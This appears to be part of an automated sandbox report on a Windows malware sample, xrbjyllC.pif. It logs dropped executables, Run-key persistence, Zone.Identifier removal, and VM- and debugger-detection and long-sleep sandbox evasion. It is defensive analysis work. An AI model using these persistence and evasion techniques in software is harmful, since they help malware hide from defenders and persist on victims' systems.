Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_00423149 push eax; ret	9_2_00423179

Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'PosZJRXGKiG9D', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'PosZJRXGKiG9D', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'PosZJRXGKiG9D', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'PosZJRXGKiG9D', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'PosZJRXGKiG9D', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\Libraries\Cllyjbrx.PIF	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\x.exe	File created: C:\Users\Public\Libraries\xrbjyllC.pif	Jump to dropped file

Drops PE files

Source: C:\Users\Public\Libraries\xrbjyllC.pif	File created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\user\AppData\Local\Temp\x.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\Libraries\Cllyjbrx.PIF	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\x.exe	File created: C:\Users\Public\Libraries\xrbjyllC.pif	Jump to dropped file

Drops PE files to the user directory

Source: C:\Windows\SysWOW64\esentutl.exe

File created: C:\Users\Public\alpha.pif

Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\x.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Cllyjbrx			Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sgxIb			Jump to behavior

Drops PE files to the user root directory

Source: C:\Windows\SysWOW64\esentutl.exe

File created: C:\Users\Public\alpha.pif

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\x.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Cllyjbrx	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Cllyjbrx	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sgxIb	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sgxIb	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\Public\Libraries\xrbjyllC.pif	File opened: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	File opened: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe:Zone.Identifier read attributes \| delete
Source: C:\Users\Public\Libraries\xrbjyllC.pif	File opened: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe:Zone.Identifier read attributes \| delete

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\AppData\Local\Temp\x.exe

3_2_031DAB1C

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\Public\Libraries\xrbjyllC.pif	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\Public\Libraries\xrbjyllC.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\Public\Libraries\xrbjyllC.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\Public\Libraries\xrbjyllC.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\Public\Libraries\xrbjyllC.pif	Memory allocated: 27F60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Memory allocated: 29C90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Memory allocated: 29A90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Memory allocated: 24F10000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Memory allocated: 26F50000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Memory allocated: 26D70000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Memory allocated: 206D0000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Memory allocated: 22710000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Memory allocated: 22320000 memory reserve \| memory write watch

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Users\Public\Libraries\xrbjyllC.pif

9_2_004019F0

Contains long sleeps (>= 3 min)

Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599203	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598860	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598735	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598222	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598068	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597946	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597844	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597719	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597110	Jump to behavior
